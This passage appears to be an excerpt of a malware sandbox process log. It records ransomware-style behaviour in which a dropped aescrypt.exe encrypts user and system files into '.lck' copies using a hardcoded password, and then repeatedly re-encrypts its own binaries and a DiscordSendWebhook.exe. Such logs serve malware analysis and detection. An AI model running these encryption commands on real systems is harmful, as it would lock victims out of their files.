- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "p2d.bat.lck" "p2d.bat"
    3⤵
    PID:1468
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "wmsetup.log.lck" "wmsetup.log"
    3⤵
    PID:1704
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "dd_NDP472-KB4054530-x86-x64-AllOS-ENU_decompression_log.txt.lck" "dd_NDP472-KB4054530-x86-x64-AllOS-ENU_decompression_log.txt"
    3⤵
    PID:344
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "dd_NDP452-KB2901907-x86-x64-AllOS-ENU_decompression_log.txt.lck" "dd_NDP452-KB2901907-x86-x64-AllOS-ENU_decompression_log.txt"
    3⤵
    PID:872
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "dd_SetupUtility.txt.lck" "dd_SetupUtility.txt"
    3⤵
    PID:584
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "dd_wcf_CA_smci_20201028_185702_190.txt.lck" "dd_wcf_CA_smci_20201028_185702_190.txt"
    3⤵
    PID:1612
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ASPNETSetup_00001.log.lck" "ASPNETSetup_00001.log"
    3⤵
    PID:540
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ASPNETSetup_00000.log.lck" "ASPNETSetup_00000.log"
    3⤵
    PID:1176
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "java_install_reg.log.lck" "java_install_reg.log"
    3⤵
    PID:1640
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "JavaDeployReg.log.lck" "JavaDeployReg.log"
    3⤵
    PID:968
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "dd_wcf_CA_smci_20201028_185700_802.txt.lck" "dd_wcf_CA_smci_20201028_185700_802.txt"
    3⤵
    PID:664
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "RGI192C.tmp-tmp.lck" "RGI192C.tmp-tmp"
    3⤵
    PID:1160
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "final.exe.lck" "final.exe"
    3⤵
    PID:1952
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "RGI192C.tmp.lck" "RGI192C.tmp"
    3⤵
    PID:944
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "dd_vcredistUI7311.txt.lck" "dd_vcredistUI7311.txt"
    3⤵
    PID:1744
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "chrome_installer.log.lck" "chrome_installer.log"
    3⤵
    PID:1368
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Admin.bmp.lck" "Admin.bmp"
    3⤵
    PID:224
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Microsoft.lck" "Microsoft"
    3⤵
    PID:1940
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ose00000.exe.lck" "ose00000.exe"
    3⤵
    PID:1532
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "java_install.log.lck" "java_install.log"
    3⤵
    PID:1020
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SetupExe(202010281908278F4).log.lck" "SetupExe(202010281908278F4).log"
    3⤵
    PID:1256
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "dd_vcredistMSI7311.txt.lck" "dd_vcredistMSI7311.txt"
    3⤵
    PID:1616
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "BleachGap.bin.exe.lck" "BleachGap.bin.exe"
    3⤵
    PID:1948
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Microsoft.lck" "Microsoft"
    3⤵
    PID:1656
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Microsoft.lck" "Microsoft"
    3⤵
    PID:1908
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /aD /b /oS
    3⤵
    PID:1080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:1232
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "aescrypt.exe.lck" "aescrypt.exe"
    3⤵
    PID:1364
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DiscordSendWebhook.exe.lck" "DiscordSendWebhook.exe"
    3⤵
    PID:1224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:1972
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "aescrypt.exe.lck" "aescrypt.exe"
    3⤵
    PID:928
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "aescrypt.exe.lck.lck" "aescrypt.exe.lck"
    3⤵
    PID:1572
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DiscordSendWebhook.exe.lck" "DiscordSendWebhook.exe"
    3⤵
    PID:216
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DiscordSendWebhook.exe.lck.lck" "DiscordSendWebhook.exe.lck"
    3⤵
    PID:1192
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:2012
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "aescrypt.exe.lck" "aescrypt.exe"
    3⤵
    PID:1468
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "aescrypt.exe.lck.lck" "aescrypt.exe.lck"
    3⤵
    PID:1704
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "aescrypt.exe.lck.lck.lck" "aescrypt.exe.lck.lck"
    3⤵
    PID:344
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DiscordSendWebhook.exe.lck" "DiscordSendWebhook.exe"
    3⤵
    PID:872
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DiscordSendWebhook.exe.lck.lck" "DiscordSendWebhook.exe.lck"
    3⤵
    PID:584
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DiscordSendWebhook.exe.lck.lck.lck" "DiscordSendWebhook.exe.lck.lck"
    3⤵
    PID:1612
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:540
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "aescrypt.exe.lck" "aescrypt.exe"
    3⤵
    PID:1176
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "aescrypt.exe.lck.lck" "aescrypt.exe.lck"
    3⤵
    PID:1640
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "aescrypt.exe.lck.lck.lck" "aescrypt.exe.lck.lck"
    3⤵
    PID:968
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "aescrypt.exe.lck.lck.lck.lck" "aescrypt.exe.lck.lck.lck"
    3⤵
    PID:664
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DiscordSendWebhook.exe.lck" "DiscordSendWebhook.exe"
    3⤵
    PID:1160
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DiscordSendWebhook.exe.lck.lck" "DiscordSendWebhook.exe.lck"
    3⤵
    PID:1952
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DiscordSendWebhook.exe.lck.lck.lck" "DiscordSendWebhook.exe.lck.lck"
    3⤵
    PID:944
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DiscordSendWebhook.exe.lck.lck.lck.lck" "DiscordSendWebhook.exe.lck.lck.lck"
    3⤵
    PID:1744
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:1368
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "aescrypt.exe.lck" "aescrypt.exe"
    3⤵
    PID:224
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "aescrypt.exe.lck.lck" "aescrypt.exe.lck"
    3⤵
    PID:912
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "aescrypt.exe.lck.lck.lck" "aescrypt.exe.lck.lck"
    3⤵
    PID:1680
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "aescrypt.exe.lck.lck.lck.lck" "aescrypt.exe.lck.lck.lck"
    3⤵
    PID:1112
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "aescrypt.exe.lck.lck.lck.lck.lck" "aescrypt.exe.lck.lck.lck.lck"
    3⤵
    PID:1016
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DiscordSendWebhook.exe.lck" "DiscordSendWebhook.exe"
    3⤵
    PID:1896
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DiscordSendWebhook.exe.lck.lck" "DiscordSendWebhook.exe.lck"
    3⤵
    PID:1076
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DiscordSendWebhook.exe.lck.lck.lck" "DiscordSendWebhook.exe.lck.lck"
    3⤵
    PID:296
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DiscordSendWebhook.exe.lck.lck.lck.lck" "DiscordSendWebhook.exe.lck.lck.lck"
    3⤵
    PID:228
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DiscordSendWebhook.exe.lck.lck.lck.lck.lck" "DiscordSendWebhook.exe.lck.lck.lck.lck"
    3⤵
    PID:212
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:1476
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "aescrypt.exe.lck" "aescrypt.exe"
    3⤵
    PID:1128
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "aescrypt.exe.lck.lck" "aescrypt.exe.lck"
    3⤵
    PID:220
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "aescrypt.exe.lck.lck.lck" "aescrypt.exe.lck.lck"
    3⤵
    PID:820
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "aescrypt.exe.lck.lck.lck.lck" "aescrypt.exe.lck.lck.lck"
    3⤵
    PID:1836
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "aescrypt.exe.lck.lck.lck.lck.lck" "aescrypt.exe.lck.lck.lck.lck"
    3⤵
    PID:1540
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "aescrypt.exe.lck.lck.lck.lck.lck.lck" "aescrypt.exe.lck.lck.lck.lck.lck"
    3⤵
    PID:2040
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DiscordSendWebhook.exe.lck" "DiscordSendWebhook.exe"
    3⤵
    PID:1392
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DiscordSendWebhook.exe.lck.lck" "DiscordSendWebhook.exe.lck"
    3⤵
    PID:236
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DiscordSendWebhook.exe.lck.lck.lck" "DiscordSendWebhook.exe.lck.lck"
    3⤵
    PID:876
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DiscordSendWebhook.exe.lck.lck.lck.lck" "DiscordSendWebhook.exe.lck.lck.lck"
    3⤵
    PID:308
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DiscordSendWebhook.exe.lck.lck.lck.lck.lck" "DiscordSendWebhook.exe.lck.lck.lck.lck"
    3⤵
    PID:2004
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DiscordSendWebhook.exe.lck.lck.lck.lck.lck.lck" "DiscordSendWebhook.exe.lck.lck.lck.lck.lck"
    3⤵
    PID:2000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:1780
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "aescrypt.exe.lck" "aescrypt.exe"
    3⤵
    PID:1564
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "aescrypt.exe.lck.lck" "aescrypt.exe.lck"
    3⤵
    PID:600
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "aescrypt.exe.lck.lck.lck" "aescrypt.exe.lck.lck"
    3⤵
    PID:2016
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "aescrypt.exe.lck.lck.lck.lck" "aescrypt.exe.lck.lck.lck"
    3⤵
    PID:1720
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "aescrypt.exe.lck.lck.lck.lck.lck" "aescrypt.exe.lck.lck.lck.lck"
    3⤵
    PID:1988
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "aescrypt.exe.lck.lck.lck.lck.lck.lck" "aescrypt.exe.lck.lck.lck.lck.lck"
    3⤵
    PID:972
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "aescrypt.exe.lck.lck.lck.lck.lck.lck.lck" "aescrypt.exe.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:752
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DiscordSendWebhook.exe.lck" "DiscordSendWebhook.exe"
    3⤵
    PID:1832
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DiscordSendWebhook.exe.lck.lck" "DiscordSendWebhook.exe.lck"
    3⤵
    PID:952
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DiscordSendWebhook.exe.lck.lck.lck" "DiscordSendWebhook.exe.lck.lck"
    3⤵
    PID:1040
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DiscordSendWebhook.exe.lck.lck.lck.lck" "DiscordSendWebhook.exe.lck.lck.lck"
    3⤵
    PID:756
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DiscordSendWebhook.exe.lck.lck.lck.lck.lck" "DiscordSendWebhook.exe.lck.lck.lck.lck"
    3⤵
    PID:1184
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DiscordSendWebhook.exe.lck.lck.lck.lck.lck.lck" "DiscordSendWebhook.exe.lck.lck.lck.lck.lck"
    3⤵
    PID:1940
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DiscordSendWebhook.exe.lck.lck.lck.lck.lck.lck.lck" "DiscordSendWebhook.exe.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:1532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:1020
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "aescrypt.exe.lck" "aescrypt.exe"
    3⤵
    PID:1256
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "aescrypt.exe.lck.lck" "aescrypt.exe.lck"
    3⤵
    PID:1616
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "aescrypt.exe.lck.lck.lck" "aescrypt.exe.lck.lck"
    3⤵
    PID:1948
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "aescrypt.exe.lck.lck.lck.lck" "aescrypt.exe.lck.lck.lck"
    3⤵
    PID:1656
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "aescrypt.exe.lck.lck.lck.lck.lck" "aescrypt.exe.lck.lck.lck.lck"
    3⤵
    PID:1908
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
